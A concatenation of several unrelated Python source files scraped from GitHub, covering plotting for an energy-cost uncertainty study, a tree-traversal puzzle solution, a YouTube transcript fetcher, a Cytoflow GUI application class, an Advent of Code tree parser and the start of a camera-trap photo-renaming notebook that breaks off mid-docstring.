ax.bar(0, np.array(CurrentCase['biopower_tot'][-1]), bottom = bot, color='lightslategrey'); bot = bot + CurrentCase['biopower_tot'][-1]
ax.bar(0, np.array(CurrentCase['solar_fix'][-1]), bottom = bot, color='wheat'); bot = bot + CurrentCase['solar_fix'][-1]
ax.bar(0, np.array(CurrentCase['wind_fix'][-1]), bottom = bot, color='skyblue'); bot = bot + CurrentCase['wind_fix'][-1]
ax.bar(0, np.array(CurrentCase['offwind_fix'][-1]), bottom = bot, color='darkblue'); bot = bot + CurrentCase['offwind_fix'][-1]
ax.bar(0, np.array(CurrentCase['nuclear_fix'][-1]), bottom = bot, color='tomato'); bot = bot + CurrentCase['nuclear_fix'][-1]
ax.bar(0, np.array(CurrentCase['geothermal_fix'][-1]), bottom = bot, color='brown'); bot = bot + CurrentCase['geothermal_fix'][-1]
ax.bar(0, np.array(CurrentCase['storage_fix'][-1]), bottom = bot, color='lightpink'); bot = bot + CurrentCase['storage_fix'][-1]
ax.set_ylim(0, 0.12)
# plt.show()
plt.savefig(name+'.ps')
plt.clf()
# with open('Cost_Uncertainty_Transient.pickle', 'rb') as handle:
# Table_Transient = pickle.load(handle)
# with open('Cost_Uncertainty_Scenario2050_spe.pickle', 'rb') as handle:
# Table_Scenario2050_Full_sub0_AllL, Table_Scenario2050_Full_sub1_GeoL, Table_Scenario2050_Full_sub2_AllH = pickle.load(handle)
# plot_transient(Table_Transient[0], 'transient_sub0')
# plot_transient(Table_Transient[1], 'transient_sub1')
# plot_transient(Table_Transient[2], 'transient_sub2')
# plot_right_panel_bar(Table_Scenario2050_Full_sub2_AllH[3], 1, 'bar_allH')
# plot_right_panel_bar(Table_Scenario2050_Full_sub1_GeoL[3], 1, 'bar_GeoL')
# plot_right_panel_bar(Table_Scenario2050_Full_sub0_AllL[3], 1, 'bar_allL')
# plot_right_panel_bar(Table_Transient[0], 0, 'bar_allH')
# plot_right_panel_bar(Table_Transient[1], 0, 'bar_GeoL')
# plot_right_panel_bar(Table_Transient[2], 0, 'bar_allL')
# """
"""
# Load-shifting
def cal_plot(CurrentCase, type, vc):
ax = plt.subplot(111)
if type == 'stack':
x_axis = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]
y_lists = [np.array(CurrentCase['natgas_tot']), np.array(CurrentCase['natgas_ccs_tot']), np.array(CurrentCase['biopower_tot']),
np.array(CurrentCase['solar_fix']), np.array(CurrentCase['wind_fix']), np.array(CurrentCase['offwind_fix']),
np.array(CurrentCase['nuclear_fix']), np.array(CurrentCase['geothermal_fix']),
np.array(CurrentCase['storage_fix']),
np.array(CurrentCase['load_shift_tot'])]
y_color = ['black', 'grey', 'lightslategrey', 'wheat', 'skyblue', 'darkblue', 'tomato', 'brown', 'lightpink', 'lightgreen']
ax.stackplot(x_axis, y_lists, colors=y_color)
ax.plot(x_axis, np.array(CurrentCase['system_cost']), color='black', linestyle='--')
ax.plot(x_axis, np.zeros(len(x_axis)), color='black')
ax.set_xlabel('PGP cost scale (%)', fontsize=14)
ax.set_ylabel('System cost ($/kWh)', fontsize=14)
ax.xaxis.labelpad = 8
ax.yaxis.labelpad = 8
ax.set_xticks( x_axis )
ax.set_xticklabels( x_axis )
ax.set_xlim(0.1, 1)
ax.set_xscale('log', basex=10)
ax.set_ylim(0, 0.12)
plt.show()
# plt.savefig(default_case_name+'.ps')
plt.clf()
if type == 'calculation':
cap = [1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1][::-1]
tot_shifted = (np.array(CurrentCase['load_shift_tot']) - np.array(cap) * 1e-8 ) / vc * 8760 / cap # kWh * hour
print (tot_shifted)
# with open('NgCcsSoWiStNu_LS.pickle', 'rb') as handle:
# table_LS_y2019, table_LS_y2050_sub0, table_LS_y2050_sub1, table_LS_y2050_sub2 = pickle.load(handle)
# var = [1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1][::-1]
# cap = [1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1][::-1]
# for var_idx in range(len(var)):
# cal_plot(table_LS_y2019[var_idx], 'stack', var[var_idx])
# cal_plot(table_LS_y2050_sub0[var_idx], 'stack', var[var_idx])
# cal_plot(table_LS_y2050_sub1[var_idx], 'stack', var[var_idx])
# cal_plot(table_LS_y2050_sub2[var_idx], 'stack', var[var_idx])
# with open('Cost_Uncertainty_Transient_ensemble.pickle', 'rb') as handle:
# table_transient_2050 = pickle.load(handle)
# system_cost_lockin = []
# for idx in range(len(table_transient_2050)):
# system_cost_lockin.append(table_transient_2050[idx]['system_cost'][0])
# system_cost_lockin = np.array(system_cost_lockin)
# with open('Cost_Uncertainty_Scenario2050.pickle', 'rb') as handle:
# Table_scenario2050_Full = pickle.load(handle)
# system_cost = Table_scenario2050_Full[0]['system_cost']
# print (np.mean(system_cost_lockin), np.std(system_cost_lockin))
# print (np.mean(system_cost), np.std(system_cost))
# plt.scatter(np.ones(729)*1, system_cost_lockin)
# plt.scatter(np.ones(729)*2, system_cost)
# plt.xlim(0, 3)
# plt.show()
# plt.clf()
# """
"""
def plot_box(ax, pos, list_exist):
if len(list_exist)>0:
min_bound = np.min(np.array(list_exist))
max_bound = np.max(np.array(list_exist))
ax.plot( np.r_[pos-0.02, pos+0.02], np.r_[min_bound, min_bound], color='black', linewidth=0.8 )
ax.plot( np.r_[pos-0.02, pos+0.02], np.r_[max_bound, max_bound], color='black', linewidth=0.8 )
ax.plot( np.r_[pos, pos ], np.r_[min_bound, max_bound], color='black', linewidth=0.8 )
def system_cost_distribution(table_in, name):
bin_edges = list(np.arange(0, 0.101, 0.001))
# tech_list_Full = ['natgas', 'natgas_ccs', 'biopower', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
tech_list_Full = ['natgas', 'natgas_ccs', 'biopower', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
system_cost = np.array(table_in['system_cost'])
cost_tables = table_in['cost']
ax1 = plt.subplot(111)
loc = 0.1
for tech_idx in tech_list_Full:
tech_cap = np.array(table_in[tech_idx+'_cap']) + np.array(table_in[tech_idx+'_fixed_cap'])
tech_fixed_cost = np.array(cost_tables[tech_idx+'_fix'])
tech_fixed_cost_unique = np.unique(tech_fixed_cost)
if len(tech_fixed_cost_unique) == 1:
list_unique, list_unique_exist = [], []
for idx in range(len(tech_fixed_cost)):
list_unique.append(system_cost[idx])
if tech_cap[idx] > 0: list_unique_exist.append(system_cost[idx])
ax1.scatter(np.ones(len(list_unique))*loc+0.0, list_unique, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.0, list_unique_exist)
loc += 0.1
pass
elif len(tech_fixed_cost_unique) == 3:
list_1, list_2, list_3 = [], [], []
list_1_exist, list_2_exist, list_3_exist = [], [], []
for idx in range(len(tech_fixed_cost)):
if tech_fixed_cost[idx] == tech_fixed_cost_unique[0]:
list_1.append(system_cost[idx])
if tech_cap[idx] > 0:
list_1_exist.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[1]:
list_2.append(system_cost[idx])
if tech_cap[idx] > 0:
list_2_exist.append(system_cost[idx])
if tech_fixed_cost[idx] == tech_fixed_cost_unique[2]:
list_3.append(system_cost[idx])
if tech_cap[idx] > 0:
list_3_exist.append(system_cost[idx])
ax1.scatter(np.ones(len(list_1))*loc+0.0, list_1, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.0, list_1_exist)
ax1.scatter(np.ones(len(list_2))*loc+0.1, list_2, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.1, list_2_exist)
ax1.scatter(np.ones(len(list_3))*loc+0.2, list_3, s=1, c=color_colors[tech_idx])
plot_box(ax1, loc+0.2, list_3_exist)
loc = loc + 0.3
system_cost_min = np.min(system_cost)
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min, system_cost_min], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.05, system_cost_min*1.05], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.1, system_cost_min*1.1], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.2, system_cost_min*1.2], color='black', linewidth=0.8, linestyle='--')
ax1.plot(np.r_[0.0, loc], np.r_[system_cost_min*1.5, system_cost_min*1.5], color='black', linewidth=0.8, linestyle='--')
ax1.set_xlim(0.0, loc)
ax1.set_ylim(0.05, 0.12)
ax1.set_xticks(np.arange(0, loc, 0.1))
# plt.show()
plt.savefig(name + '_sc.ps')
plt.clf()
# """
# """
def system_cost_distribution_PDF(table_in):
    """For each technology whose fixed cost takes exactly three distinct
    values in the ensemble, plot kernel-density estimates of the total
    system cost conditioned on the low (L), medium (M) and high (H)
    fixed-cost level; one figure is shown per technology.

    NOTE(review): relies on module-level aliases `np` (numpy), `st`
    (presumably scipy.stats) and `plt` (presumably matplotlib.pyplot) --
    confirm against the imports at the top of the file.
    (Unused locals from the original -- `tech_cap`, `caps_1/2/3` -- were
    removed; they were computed but never read.)
    """
    tech_list_Full = ['natgas_ccs', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
    system_cost = np.array(table_in['system_cost'])
    cost_tables = table_in['cost']
    for tech_idx in tech_list_Full:
        tech_fixed_cost = np.array(cost_tables[tech_idx+'_fix'])
        tech_fixed_cost_unique = np.unique(tech_fixed_cost)
        if len(tech_fixed_cost_unique) == 3:
            # Partition the ensemble's system costs by this technology's
            # assigned fixed-cost level (np.unique sorts low-to-high).
            list_1, list_2, list_3 = [], [], []
            for idx in range(len(tech_fixed_cost)):
                if tech_fixed_cost[idx] == tech_fixed_cost_unique[0]: list_1.append(system_cost[idx])
                if tech_fixed_cost[idx] == tech_fixed_cost_unique[1]: list_2.append(system_cost[idx])
                if tech_fixed_cost[idx] == tech_fixed_cost_unique[2]: list_3.append(system_cost[idx])
            # Distribution of costs.  gaussian_kde raises when a partition is
            # empty or degenerate; the original used bare `except:` which also
            # swallowed KeyboardInterrupt -- narrowed to Exception.
            ax1 = plt.subplot(111)
            x_axis = np.arange(0.05, 0.111, 0.001)
            try:
                kde_L = st.gaussian_kde(list_1); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_L.pdf(x_axis)*0.001, facecolor='#fdf289', edgecolor='#fdf289', linestyle='--', linewidth=0.8, alpha=0.5, label='L')
            except Exception:
                print ('no L')
            try:
                kde_M = st.gaussian_kde(list_2); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_M.pdf(x_axis)*0.001, facecolor='#46edc8', edgecolor='#46edc8', linestyle='--', linewidth=0.8, alpha=0.5, label='M')
            except Exception:
                print ('no M')
            try:
                kde_H = st.gaussian_kde(list_3); ax1.fill_between(x_axis, np.zeros(len(x_axis)), kde_H.pdf(x_axis)*0.001, facecolor='#374d7c', edgecolor='#374d7c', linestyle='--', linewidth=0.8, alpha=0.5, label='H')
            except Exception:
                print ('no H')
            ax1.set_xlim(0.05, 0.11)
            ax1.set_ylim(0, 0.15)
            plt.show()
            # plt.savefig(f'panel_low_{tech_idx}.ps')
            plt.clf()
def system_cost_distribution_PDF_whole(table_in, name):
    """Draw a kernel-density estimate of the whole ensemble's system cost.

    `name` is only referenced by the commented-out savefig call below.
    Depends on module-level `np`, `st` and `plt` aliases.
    """
    costs = np.array(table_in['system_cost'])
    density = st.gaussian_kde(costs)
    grid = np.arange(0.05, 0.111, 0.001)
    axis = plt.subplot(111)
    axis.fill_between(grid, np.zeros(len(grid)), density.pdf(grid)*0.001, facecolor='black', edgecolor='black', linestyle='--', linewidth=0.8, alpha=0.5)
    axis.set_xlim(0.05, 0.10)
    axis.set_ylim(0, 0.08)
    plt.show()
    # plt.savefig(f'whole{name}.ps')
    plt.clf()
def cal_cap_range(table_in1, table_in2):
    """Print summary statistics comparing two ensembles' system costs
    (table_in1: presumably the greenfield run, table_in2: the transient
    run -- see the call site below; confirm).

    NOTE(review): execution deliberately halts at the bare name `stop`
    below (it raises NameError), so the capacity-difference bar chart
    after it is currently dead code.
    """
    bin_edges = list(np.arange(0, 0.101, 0.001))  # NOTE(review): unused
    tech_list_Full = ['natgas', 'natgas_ccs', 'biopower', 'solar', 'wind', 'offwind', 'nuclear', 'geothermal', 'storage']
    # Numbers in text
    system_cost1 = np.array(table_in1['system_cost'])
    system_cost2 = np.array(table_in2['system_cost'])
    # Min/max and relative differences of the two cost distributions.
    sc1_least = np.min(system_cost1); sc1_max = np.max(system_cost1)
    sc2_least = np.min(system_cost2); sc2_max = np.max(system_cost2)
    print (sc2_least, sc1_least, (sc2_least-sc1_least)/sc1_least*100)
    print (sc1_max)
    # Spread (standard deviation) comparison.
    sc1_std = np.std(system_cost1)
    sc2_std = np.std(system_cost2)
    print (sc2_std, sc1_std, (sc2_std-sc1_std)/sc1_std*100 )
    print (sc2_max, (sc1_max-sc2_max)/sc1_max*100)
    # Share of ensemble 2 members costing >50% more than its cheapest member.
    sc_50plarger = sc2_least * 1.5
    sc_ensemble_50pm = system_cost2[system_cost2>sc_50plarger]
    print (len(sc_ensemble_50pm)/len(system_cost2)*100)
    stop  # intentional NameError: abort before the plotting below runs
    # --- dead code below this point ---
    # Bar chart of mean capacity difference (transient - greenfield) per tech.
    ax1 = plt.subplot(111)
    loc = 1
    for tech_idx in tech_list_Full:
        cap_greenfield = np.array(table_in1[tech_idx+'_cap'])
        cap_transients = np.array(table_in2[tech_idx+'_cap']) + np.array(table_in2[tech_idx+'_fixed_cap'])
        diff = np.mean(cap_transients - cap_greenfield)
        ax1.bar(loc, diff, width=0.8, color=color_colors[tech_idx])
        loc += 1
    ax1.plot(np.r_[0, loc], np.r_[0, 0], color='black', linewidth=0.5)
    ax1.set_xlim(0, loc)
    ax1.set_xticks(np.arange(1, loc, 1))
    ax1.set_ylim(-0.2, 0.7)
    # plt.show()
    plt.savefig('change_cap.ps')
    plt.clf()
# Load the 2050 transient-ensemble and 2050 greenfield-scenario result tables
# (pickled by an earlier stage; files must exist in the working directory).
with open('Cost_Uncertainty_Transient_ensemble2050.pickle', 'rb') as handle:
    table_transient_2050 = pickle.load(handle)
with open('Cost_Uncertainty_Scenario2050.pickle', 'rb') as handle:
    Table_scenario2050_Full = pickle.load(handle)
# with open('Cost_Uncertainty_GeoCapEnsemble.pickle', 'rb') as handle:
#     Table_scenario2050_GeoCap = pickle.load(handle)
# system_cost_distribution(Table_scenario2050_Full[0], 'greeofield')
# system_cost_distribution(table_transient_2050[0], 'transient')
# system_cost_distribution_PDF(table_transient_2050[0])
# system_cost_distribution_PDF_whole(Table_scenario2050_Full[0], 'noS')
# system_cost_distribution_PDF_whole(Table_scenario2050_GeoCap[0], 'withS07')
# system_cost_distribution_PDF_whole(Table_scenario2050_GeoCap[1], 'withS05')
# system_cost_distribution_PDF_whole(Table_scenario2050_GeoCap[2], 'withS03')
# Compare the two ensembles; note cal_cap_range halts itself partway through.
cal_cap_range(Table_scenario2050_Full[0], table_transient_2050[0])
# """
# # Transient new gas
# with open('Cost_Uncertainty_Transient_NewGas.pickle', 'rb') as handle:
# table_transient_NewGas = pickle.load(handle)
# initial_cap_list = []
# no_new_additions = []
# final_capacities = []
# for idx in range(729):
# natgas_cap = np.array(table_transient_NewGas[idx]['natgas_cap']).astype('float')
# natgas_ccs_cap = np.array(table_transient_NewGas[idx]['natgas_ccs_cap']).astype('float')
# natgas_fixed_cap = np.array(table_transient_NewGas[idx]['natgas_fixed_cap']).astype('float')
# natgas_ccs_fixed_cap = np.array(table_transient_NewGas[idx]['natgas_ccs_fixed_cap']).astype('float')
# total_fossil_cap = natgas_cap + natgas_ccs_cap + natgas_fixed_cap + natgas_ccs_fixed_cap
# initial_cap_list.append(total_fossil_cap[0])
# no_new_additions.append(total_fossil_cap[0]*(1-1/30)**31)
# final_capacities.append(total_fossil_cap[-1])
# diff = np.array(final_capacities) - np.array(no_new_additions)
# print (diff) | LDuan3008/MEM_CostUncertainty | Postprocess_codes/Postprocess_uncertainty.py | Postprocess_uncertainty.py | py | 32,979 | python | en | code | 0 | github-code | 13 |
9940171419 | # import math, heapq, bisect, itertools, functools
# from collections import deque, Counter, defaultdict, OrderedDict
# python sample.py < input.txt
if __name__ == '__main__':
    # Read a tree on n vertices: n, then n-1 undirected edges (1-based in
    # the input, stored 0-based in adjacency list A).
    n = int(input())
    A = [[] for _ in range(n)]
    for _ in range(n-1):
        u, v = [int(i)-1 for i in input().split()]
        A[u].append(v)
        A[v].append(u)
    # print(A)
    ans = []
    # def bfs(node, parent, level):
    #     global ans, A
    #     if level % 3 == 1:
    #         ans.append(len(A[node]))
    #     for child in A[node]:
    #         if child == parent:
    #             continue
    #         bfs(child, node, level + 1)
    # Iterative level-order traversal (replaces the recursive bfs above,
    # avoiding Python's recursion limit on deep trees).  The traversal is
    # rooted at the first leaf found (degree 1).
    # NOTE(review): if n == 1 no leaf is found and nothing is printed --
    # confirm against the problem's constraints.
    level = 0
    vis = [False] * n
    cur = []
    for i in range(n):
        if len(A[i]) == 1:
            vis[i] = True
            cur.append(i)
            break
    while cur:
        nxt = []
        for node in cur:
            # Collect the degree of every node whose depth is ≡ 1 (mod 3).
            if level % 3 == 1:
                ans.append(len(A[node]))
            for child in A[node]:
                if vis[child]:
                    continue
                vis[child] = True
                nxt.append(child)
        cur = nxt
        level += 1
    # Output the collected degrees in ascending order, space-separated,
    # with a trailing newline after the last one.
    ans.sort()
    for i in range(len(ans)):
        print(ans[i], end=' \n'[i == len(ans)-1])
4912316824 | from youtube_transcript_api import YouTubeTranscriptApi, NoTranscriptFound
from urllib.parse import parse_qs, urlparse

video_url = 'https://www.youtube.com/watch?v=Bb0J_2imRQc'

# Extract the video id from the "v" query parameter.  This is more robust
# than the old `split("watch?v=")[-1]`, which kept any trailing parameters
# (e.g. "...watch?v=ID&t=42s" yielded "ID&t=42s").  Fall back to the old
# behavior for URLs without a "v" parameter.
_query = parse_qs(urlparse(video_url).query)
video_id = _query['v'][0] if 'v' in _query else video_url.split("watch?v=")[-1]

try:
    # Fetching the transcript
    transcript = YouTubeTranscriptApi.get_transcript(video_id)
    # Printing the transcript
    for text in transcript:
        print(text['text'])
except NoTranscriptFound:
    print("No transcript found for this video.")
| marciob/youtube-text-transcript | get_text_transcript1.py | get_text_transcript1.py | py | 439 | python | en | code | 0 | github-code | 13 |
15190298330 | #!/usr/bin/env python3.4
# coding: latin-1
# (c) Massachusetts Institute of Technology 2015-2018
# (c) Brian Teague 2018-2019
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on Mar 15, 2015
@author: brian
'''
import logging, io, os, pickle
from cytoflowgui.workflow import Workflow
from cytoflowgui.flow_task_pane import FlowTaskPane
from cytoflowgui.util import CallbackHandler
from envisage.ui.tasks.api import TasksApplication
from envisage.ui.tasks.tasks_application import TasksApplicationState
from pyface.api import error
from pyface.tasks.api import TaskWindowLayout
from traits.api import Bool, Instance, List, Property, Str, Any, File
logger = logging.getLogger(__name__)
from .preferences import CytoflowPreferences
def gui_handler_callback(msg, app):
    """Store an ERROR-level log message on the application object so the UI
    thread can pick it up (the `application_error` trait change is routed to
    CytoflowApplication.show_error)."""
    app.application_error = msg
class CytoflowApplication(TasksApplication):
    """ The cytoflow Tasks application.

    Wires up logging (console, in-memory buffer, GUI error dialogs), the
    shared Workflow model that talks to the remote worker process, the
    shared plot pane, and saving/restoring of the window layout.
    """

    # The application's globally unique identifier.
    id = 'edu.mit.synbio.cytoflow'

    # The application's user-visible name.
    name = 'Cytoflow'

    # Override two traits from TasksApplication so we can provide defaults, below
    # The default window-level layout for the application.
    default_layout = List(TaskWindowLayout)

    # Whether to restore the previous application-level layout when the
    # applicaton is started.
    always_use_default_layout = Property(Bool)

    # are we debugging? at the moment, just for sending logs to the console
    debug = Bool

    # did we get a filename on the command line?
    filename = File

    # if there's an ERROR-level log message, drop it here
    application_error = Str

    # keep the application log in memory
    application_log = Instance(io.StringIO, ())

    # local process's central model
    remote_process = Any
    remote_connection = Any

    model = Instance(Workflow)

    # the shared task pane
    plot_pane = Instance(FlowTaskPane)

    def run(self):
        """Configure logging, build the Workflow model and shared plot pane,
        then start the GUI event loop."""

        # set the root logger level to DEBUG; decide what to do with each
        # message on a handler-by-handler basis
        logging.getLogger().setLevel(logging.DEBUG)

        ## send the log to STDERR
        try:
            console_handler = logging.StreamHandler()
            console_handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s:%(name)s:%(message)s"))
            console_handler.setLevel(logging.DEBUG if self.debug else logging.ERROR)
            logging.getLogger().addHandler(console_handler)
        except Exception:
            # if there's no console, this fails -- continue without the
            # stderr handler.  (Was a bare `except:`, which also swallowed
            # KeyboardInterrupt and SystemExit.)
            pass

        ## capture log in memory
        mem_handler = logging.StreamHandler(self.application_log)
        mem_handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s:%(name)s:%(message)s"))
        mem_handler.setLevel(logging.DEBUG)
        logging.getLogger().addHandler(mem_handler)

        ## and display gui messages for exceptions
        gui_handler = CallbackHandler(lambda rec, app = self: gui_handler_callback(rec.getMessage(), app))
        gui_handler.setLevel(logging.ERROR)
        logging.getLogger().addHandler(gui_handler)

        # must redirect to the gui thread
        self.on_trait_change(self.show_error, 'application_error', dispatch = 'ui')

        # set up the model
        self.model = Workflow(remote_connection = self.remote_connection,
                              debug = self.debug)

        # and the shared central pane
        self.plot_pane = FlowTaskPane(model = self.model)

        # run the GUI (zero-argument super(), consistent with stop() below)
        super().run()

    def show_error(self, error_string):
        """Show a modal error dialog; dispatched on the UI thread whenever
        the `application_error` trait changes."""
        error(None, "An exception has occurred. Please report a problem from the Help menu!\n\n"
                    "Afterwards, may need to restart Cytoflow to continue working.\n\n"
                    + error_string)

    def stop(self):
        """Stop the Tasks application, then shut down the remote worker."""
        super().stop()
        self.model.shutdown_remote_process(self.remote_process)

    preferences_helper = Instance(CytoflowPreferences)

    ###########################################################################
    # Private interface.
    ###########################################################################

    def _load_state(self):
        """
        Loads saved application state, if possible. Overload the envisage-
        defined one to fix a py3k bug and increment the TasksApplicationState
        version.
        """
        state = TasksApplicationState(version = 2)
        filename = os.path.join(self.state_location, 'application_memento')
        if os.path.exists(filename):
            # Attempt to unpickle the saved application state.
            try:
                with open(filename, 'rb') as f:
                    restored_state = pickle.load(f)
                if state.version == restored_state.version:
                    state = restored_state

                    # make sure the active task is the main window
                    state.previous_window_layouts[0].active_task = 'edu.mit.synbio.cytoflowgui.flow_task'
                else:
                    # warn() is a deprecated alias of warning()
                    logger.warning('Discarding outdated application layout')
            except Exception:
                # If anything goes wrong, log the error and continue.
                # (Was a bare `except:`.)
                logger.exception('Had a problem restoring application layout from %s',
                                 filename)

        self._state = state

    def _save_state(self):
        """
        Saves the application window size, position, panel locations, etc
        """
        # Grab the current window layouts.
        window_layouts = [w.get_window_layout() for w in self.windows]
        self._state.previous_window_layouts = window_layouts

        # Attempt to pickle the application state.
        filename = os.path.join(self.state_location, 'application_memento')
        try:
            with open(filename, 'wb') as f:
                pickle.dump(self._state, f)
        except Exception as e:
            # If anything goes wrong, log the error and continue
            # (lazy %-formatting instead of str.format in the log call).
            logger.exception('Had a problem saving application layout: %s', e)

    #### Trait initializers ###################################################

    def _default_layout_default(self):
        """Default layout: every registered task in one 1280x800 window,
        with the preferences' default task active."""
        active_task = self.preferences_helper.default_task
        tasks = [ factory.id for factory in self.task_factories ]
        return [ TaskWindowLayout(*tasks,
                                  active_task = active_task,
                                  size = (1280, 800)) ]

    def _preferences_helper_default(self):
        """Wrap the application's preferences store in the helper class."""
        return CytoflowPreferences(preferences = self.preferences)

    #### Trait property getter/setters ########################################

    def _get_always_use_default_layout(self):
        """Property getter: delegate to the saved preference."""
        return self.preferences_helper.always_use_default_layout
| kkiwimagi/cytoflow-microscopy-kiwi | cytoflowgui/cytoflow_application.py | cytoflow_application.py | py | 7,568 | python | en | code | 0 | github-code | 13 |
17304824026 | data = [int(i) for i in input().split()]
class Node:
    """One node of the recursively-encoded tree (Advent of Code 2018, day 8).

    The flat serialization is: child count, metadata count, each child
    (recursively), then the metadata entries.
    """

    def __init__(self, data, i):
        # data: the flat list of ints; i: index where this node's header starts.
        self.children = []
        self.metadata = []
        self.children_count = data[i]
        i += 1
        self.metadata_count = data[i]
        i += 1
        for _ in range(self.children_count):
            self.children.append(Node(data, i))
            i = self.children[-1].last_index
        for _ in range(self.metadata_count):
            self.metadata.append(data[i])
            i += 1
        # Index of the first element after this node, so the parent can
        # keep parsing its next child.
        self.last_index = i
        self.score = None  # memoized result of get_score()

    def get_score(self):
        """Return this node's value per the part-2 rules.

        A leaf's value is the sum of its metadata.  Otherwise each metadata
        entry is a 1-based child index; entries of 0 (explicitly "refers to
        no child" in the puzzle) or past the last child are skipped.
        """
        if self.score is not None:
            return self.score
        if not self.children:
            self.score = sum(self.metadata)
            return self.score
        score = 0
        for ref in self.metadata:
            # Bug fix: the old check only rejected indices past the end, so a
            # metadata entry of 0 wrongly indexed children[-1] (the last child).
            if ref == 0 or ref > len(self.children):
                continue
            score += self.children[ref - 1].get_score()
        # Bug fix: the memo was never stored before, so the cache check at the
        # top could never hit.
        self.score = score
        return self.score
# Parse the whole tree from the flat number list read above, then print
# the root node's part-2 value.
root = Node(data, 0)
print(root.get_score())
| kameranis/advent_of_code_2018 | day_8/sol_2.py | sol_2.py | py | 959 | python | en | code | 1 | github-code | 13 |
1078216782 | #!/usr/bin/env python
# coding: utf-8
# # Renaming photos
# ## Author(s): Brian Nhan Thien Chung (UCI NATURE research technician)
# ### Created on: Friday August 28, 2020 by Brian Nhan Thien Chung
# ### Last edited on: Wednesday September 9, 2020 by Brian Nhan Thien Chung
#
# The purpose of this Jupyter Notebook is to rename photos. As a proof of concept, photos taken at Bonita Canyon will be renamed before photos from other camera locations are renamed.
#
# After a successful proof of concept, functions are generated out of the code that was used to rename photos taken at Bonita Canyon. This allows for an abstraction of the renaming process down to a single step: calling a single function to rename photos from a camera.
#
# This Jupyter Notebook reads in a csv file of re-labeled animal photos as a pandas dataframe. This notebook can rename photos from one camera at a time. It assumes that photos that the user wants to rename from a particular camera are in an unzipped folder that is in the same directory as this notebook. The location of the csv file is assumed to be in the directory titled "Species distribution analysis". If these assumptions are not met, then this notebook cannot rename photos, and the user will have to manually code out the renaming process.
#
# The notebook will compare the photos of the camera that the user wants to rename with the photos in the csv file of re-labeled animal photos. The photos will be copied, and each copied photo will have a name with the following components:
#
# (1) The original image number
#
# (2) 2-letter camera code
#
# (3) Date the photo was taken
#
# (4, optional) Species, if the photo was noted to have a species in the csv file. If not, then this element is missing.
#
# To rename photos of a particular camera, please ensure that the above assumptions are met first. Then simply call the following function: renamePhotosInCamera(). This function will then call 2 other functions. Ignore these 2 other functions unless if there is a bug and just call this function. This function takes 2 arguments in the following order:
#
# (1) Folder name of the camera whose photos the user wants to rename. Simply copy and paste the folder name in for this argument.
#
# (2) 2-letter camera code of the particular camera whose photos the user wants to rename
#
# Both arguments must have the string data type.
#
# The function does not return anything. It can only rename photos from one camera at a time. To rename multiple cameras, simply repeat the steps and follow the assumptions above: the user must ensure that each camera whose photos the user wants to rename each have a directory that is in the same directory as this notebook. The user must then call this function and put in the folder name and the 2-letter camera code as strings. Simply repeat the steps and follow the assumptions above multiple times until photos from every camera the user wants to rename had been renamed.
#
# The following folder structures are the only acceptable folder structures for this notebook:
#
# (1) overall camera folder -------> subfolders ----------> photos
#
# (2) overall camera folder -------> photos
#
# Please ensure that these folder structures are met. No other structures are acceptable in this notebook.
#
# Please ensure that there are no periods in photo names other than the period before the photo's file extension.
#
# Also, this is intended to rename very large amounts of photos. Photos from Research Park alone numbered approximately 32 gigabytes. Since this code duplicates photos, the total number of photos jumped up to 64 gigabytes after renaming. Please ensure that your machine has enough storage space to rename photos.
#
# Now, have fun!
# In[3]:
get_ipython().run_line_magic('autosave', '10')
# In[4]:
import os
import shutil
from pathlib import Path
import pandas as pd
from PIL import Image
from PIL.ExifTags import TAGS
# In[5]:
# Remember the notebook's working directory as a Path; camera folders are
# expected to live directly inside it.
ogcwdStr = os.getcwd()
ogcwd = Path(ogcwdStr)
os.chdir(ogcwd)
dirList = os.listdir()
# print(os.getcwd())
print(dirList)


# In[6]:


# Load the CSV of re-labeled animal photos from the sibling
# "Species distribution analysis" directory (one level up from here).
overallDirectory = Path(os.path.dirname(ogcwd))
speciesDistriAnalyDir = "Species distribution analysis"
relabeledPhotosDir = overallDirectory/speciesDistriAnalyDir
relabeledPhotos = "re-labeled animal photos.csv"
relabeledPhotos = pd.read_csv(relabeledPhotosDir/relabeledPhotos)
# Module-level globals used by the renaming functions below.
relabeledPhotoNames = relabeledPhotos["ImageNumber"].tolist()
cameraCounts = relabeledPhotos.groupby("LocCode")["LocCode"].count()
cameraCodes = cameraCounts.index.tolist()
# Bare expression: a notebook-display artifact (shows the camera codes).
cameraCodes
# In[7]:
def makeRenamedDirectories(overallCameraDir: "name of camera folder"):
    """Create the '<camera> - renamed' directory tree that will hold renamed photos.

    For every subdirectory of the camera folder (skipping any already named
    '... - renamed'), a matching '<subdir> - renamed' directory is created
    and its name is printed.  Relies on the module-level `ogcwd` Path.

    Returns a 4-tuple: (original subdirectory Paths, renamed subdirectory
